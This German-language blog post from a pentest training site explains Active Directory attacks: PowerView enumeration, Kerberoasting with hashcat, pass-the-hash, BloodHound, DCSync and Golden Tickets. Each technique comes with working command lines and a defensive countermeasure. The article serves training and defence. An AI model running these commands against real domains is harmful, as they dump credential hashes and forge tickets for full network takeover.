Active Directory Angriffe erklärt: Kerberoasting, BloodHound und DCSync
7. September 2026 · von Pentevo
Active Directory (AD) ist das Herzstück der IT-Infrastruktur in deutschen Unternehmen. Banken, Behörden, Industrieunternehmen — nahezu jede Organisation mit mehr als 50 Mitarbeitern nutzt AD zur Verwaltung von Benutzern, Computern und Zugriffsrechten.
Für Angreifer ist Domain Admin-Zugriff das Endziel eines jeden Unternehmensangriffs — und für Pentester ist das Verständnis dieser Techniken essentiell. Gleichzeitig sind die gleichen Tools und Techniken die besten defensiven Audit-Werkzeuge.
Active Directory Grundlagen für Pentester
Schlüsselkonzepte
- Domain Controller (DC): Der Server, der AD verwaltet und Kerberos-Tickets ausstellt
- LDAP: Das Protokoll zum Abfragen von AD-Objekten (User, Gruppen, Computer)
- Kerberos: Das Standard-Authentifizierungsprotokoll in AD-Umgebungen
- NTLM: Älteres Authentifizierungsprotokoll, noch immer in vielen Umgebungen aktiv
- SPNs (Service Principal Names): Kennzeichen von Diensten, die Kerberos-Authentifizierung nutzen
Enumeration: Der erste Schritt
Vor jedem Angriff steht Reconnaissance. Mit einem Domain-Benutzer-Account:
# PowerView (PowerShell-Tool)
Import-Module .\PowerView.ps1
Get-NetDomain # Domain-Informationen
Get-NetUser | select cn,description # Alle User mit Beschreibungen
Get-NetGroup "Domain Admins" # Domain Admin Mitglieder
Get-NetComputer # Alle Computer im Netzwerk
Find-LocalAdminAccess # Wo haben wir lokale Admin-Rechte?
Kerberoasting
Wie es funktioniert
Jeder Domain-Benutzer kann Service Tickets für Dienste mit SPNs anfordern. Diese Tickets werden mit dem NTLM-Hash des Service-Accounts verschlüsselt. Offline-Cracking ist möglich — und erzeugt dabei keine verdächtige Netzwerkaktivität (nur einen normalen Kerberos-Request).
# Alle kerberoasbaren Service-Accounts finden und Tickets abrufen
Import-Module .\PowerView.ps1
Invoke-Kerberoast -OutputFormat Hashcat | % { $_.Hash }
# Offline-Cracking mit Hashcat
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
Schutz: Managed Service Accounts (gMSA) verwenden, starke (>25 Zeichen) Passwörter für Service-Accounts, regelmäßige Rotation.
Pass-the-Hash (PtH)
NTLM-Hashes können direkt für Authentifizierung verwendet werden — kein Klartextpasswort notwendig. Besonders gefährlich bei wiederverwendeten lokalen Administrator-Passwörtern.
# CrackMapExec: PtH gegen ganzes Netzwerksegment
crackmapexec smb 10.10.10.0/24 -u administrator -H <NTLM-Hash>
# Impacket psexec
psexec.py administrator@10.10.10.x -hashes :<NTLM-Hash>
Schutz: LAPS (Local Administrator Password Solution) — jeder Computer bekommt ein zufälliges lokales Admin-Passwort.
BloodHound: AD-Angriffspfade visualisieren
BloodHound ist das mächtigste AD-Analyse-Tool — sowohl für Angreifer als auch für Defender. Es kartiert Beziehungen in AD und findet Angriffspfade zu Domain Admin.
# SharpHound (Collector) auf einem Domain-Computer ausführen
.\SharpHound.exe -c All
# ZIP-Datei in BloodHound importieren
# Vordefinierten Queries nutzen: "Shortest Path to Domain Admins"
BloodHound zeigt grafisch, wie ein kompromittierter normaler Benutzer über Gruppen-Mitgliedschaften, ACL-Berechtigungen oder Delegation-Einstellungen zu Domain Admin eskalieren kann.
Defensiv nutzen: Sicherheitsteams verwenden BloodHound zur proaktiven Identifikation überprivilegierter Konten und riskanter Berechtigungspfade.
DCSync
Mit Domain Replication-Berechtigungen (typisch für Domain Admins) kann ein Angreifer den Domain Controller täuschen, als wäre er ein anderer DC, und NTLM-Hashes aller Domain-Accounts herunterladen — inklusive krbtgt (für Golden Tickets).
# Impacket secretsdump
secretsdump.py 'domain/administrator:password@dc-ip'
# Mimikatz
lsadump::dcsync /user:krbtgt
Schutz: Replication-Berechtigungen nur für echte DCs, keine über-privilegierten regulären Accounts.
Golden Ticket
Mit dem NTLM-Hash des krbtgt-Accounts (aus DCSync) können beliebige Kerberos-Tickets gefälscht werden — für jeden User, jede Gruppe, unbegrenzte Gültigkeit.
# Mimikatz
kerberos::golden /user:fake_admin /domain:corp.de /sid:<DOMAIN-SID> /krbtgt:<HASH> /ticket:golden.kirbi
Ein Golden Ticket gibt dauerhaften Zugriff auf das gesamte AD — auch nach Passwortänderungen des kompromittierten Accounts. Gegenmaßnahme: krbtgt-Passwort zweimal zurücksetzen (aufgrund der History-Funktion).
Lernressourcen für AD-Pentesting
- TryHackMe: Rooms "Active Directory Basics", "Attacktive Directory", "Post-Exploitation Basics"
- HackTheBox Pro Labs: Offshore und RastaLabs — realistische AD-Umgebungen
- TCM Security: Praktischer Active Directory Kurs (bezahlt)
- PayloadsAllTheThings: AD-Angriffs-Referenz auf GitHub
Verbinden Sie AD-Pentesting mit den Grundlagen aus den kostenlosen Pentevo-Kursen — Netzwerksicherheit und Zugriffskontrollen sind CEH-Kernthemen.
Häufig gestellte Fragen
Warum ist Active Directory so ein häufiges Angriffsziel?
Über 90% deutscher Unternehmen mit mehr als 50 Mitarbeitern nutzen Active Directory zur Benutzer- und Zugriffsverwaltung. Wer Domain Admin-Rechte in AD erlangt, kontrolliert das gesamte Unternehmensnetzwerk — inklusive aller Server, Dateifreigaben und angebundenen Cloud-Dienste. Das macht AD zum attraktivsten Ziel in Unternehmensangriffen.
Was ist Kerberoasting?
Kerberoasting ist eine Technik, bei der ein authentifizierter Domain-Benutzer Service Tickets für Dienste mit Service Principal Names (SPNs) anfordert. Diese Tickets sind mit dem NTLM-Hash des Service-Accounts verschlüsselt und können offline geknackt werden, ohne Netzwerkkommunikation zu erzeugen.
Wie schütze ich mein Active Directory vor diesen Angriffen?
Wichtigste Maßnahmen: Privileged Access Workstations (PAW), LAPS für lokale Admin-Passwörter, Tiered Administration Model, Microsoft Defender for Identity für Angriffserkennung, regelmäßige AD-Audits mit BloodHound (defensiv genutzt), starke Passwörter für Service-Accounts und Managed Service Accounts.
Brauche ich ein Lab für Active Directory Übungen?
Ja. Richten Sie ein isoliertes [Heimlabor](/de/blog/home-lab-cybersecurity) mit Windows Server 2019 (Eval-Lizenz kostenlos) und zwei Windows-Clients ein. TryHackMe hat auch geführte AD-Rooms ohne eigene Hardware. HackTheBox Pro Labs (Offshore, RastaLabs) bieten realistische AD-Umgebungen.
Weiterführende Artikel
Heimlabor für Cybersecurity aufbauen 2026: Hardware, VMs und Tools
Schritt-für-Schritt-Anleitung zum Aufbau eines Cybersecurity-Heimlabors: Hardware-Empfehlungen, VirtualBox vs. VMware, Kali Linux, verwundbare VMs und Kosten.
ToolsPassword Cracking Guide 2026: Hashcat, John the Ripper und Wordlists
Passwörter knacken als Pentester: Hashcat und John the Ripper erklärt, Hash-Typen identifizieren, Wordlists und Rules — für autorisierten Einsatz in Penetrationstests.
ToolsPrivilege Escalation erklärt: Linux und Windows Rechteausweitung 2026
Vollständiger Leitfaden zur Privilege Escalation: Linux- und Windows-Techniken, Tools wie LinPEAS/WinPEAS, GTFOBins und Vorbereitung für OSCP und Pentesting.
ToolsNmap-Befehle: Der praktische Spickzettel (2026)
Die Nmap-Befehle, die Sie tatsächlich brauchen — Host-Discovery, Portscans, Dienst- und OS-Erkennung, Timing und die NSE-Skript-Engine — mit Beispielen.
Praktisch anwenden
Die Pentevo Academy macht aus diesen Konzepten geführte Lektionen, Videos und Quizze — kostenlos.
Kostenlos lernen